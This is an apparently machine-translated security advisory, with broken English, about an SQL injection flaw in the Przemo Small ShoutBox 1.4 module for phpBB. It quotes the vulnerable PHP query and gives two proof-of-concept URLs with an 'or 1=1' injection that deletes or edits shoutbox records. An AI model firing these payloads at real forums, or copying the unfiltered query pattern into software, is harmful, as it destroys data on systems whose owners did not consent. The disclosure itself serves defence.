Issues the date: 2008-11-13
Renewal date: 2008-11-14
Is affected the system:
Przemo Small ShoutBox 1.4
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 32287
Small the ShoutBox module is a message center module which in the phpBB forum uses.
If the mode establishment is delete, Small ShoutBox the module shoutbox_view.php document has not filtered correctly to the id parameter input then uses, in SQL was inquired:
File (shoutbox_view.php)
50. $id = (isset ($HTTP_GET_VARS ['id']))? $HTTP_GET_VARS ['id']: $HTTP_POST_VARS ['id'];
168. if ($mode == “delete” && $adel)
169. {
170. $sql = “DELETE FROM”. SHOUTBOX_TABLE. “
171. WHERE id = $id $del_mod ";
172. if (! ($result = $db->sql_query($sql)))
173. {message_die (GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE, __FILE, $sql); }
174.
This permission long-distance aggressor through to the forum submission evil intention requested that carries out SQL to pour into the attack.
<* origin: StAkeR (StAkeR@hotmail.it)
Link: http://secunia.com/advisories/32565/
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!
http://www.example.com/shoutbox_view.php?mode=delete&id=-1 or 1=1/*
http://www.example.com/shoutbox_view.php?mode=edit&id=-1 or 1=1/*& name_id=1 or 1=1/*& date_edit=1225915829& name_edit=[NICKNAME]& clean_msg=[MESSAGE]
Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:
Przemo
------
At present the manufacturer has not provided the patch or the promotion procedure, we suggested that uses this software's user momentarily to pay attention to the manufacturer the main page to gain the newest edition:
http://www.przemo.org/phpBB2/index.php?page=list
|